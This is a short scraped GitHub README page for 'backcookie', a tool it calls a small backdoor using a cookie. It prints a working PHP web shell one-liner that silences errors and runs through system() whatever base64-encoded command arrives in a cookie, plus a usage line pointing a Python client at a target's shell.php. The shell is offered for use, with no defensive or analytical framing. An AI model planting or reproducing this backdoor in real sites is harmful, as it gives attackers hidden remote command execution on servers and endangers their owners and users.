Skip to content

Latest commit

 

History

History
24 lines (15 loc) · 502 Bytes

File metadata and controls

24 lines (15 loc) · 502 Bytes

backcookie

Total views

Small backdoor using cookie.

==========

<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>
Example: python backcookie.py -u http://target.com/shell.php -c name_cookie

Developer


Copyright, 2013 by José Pino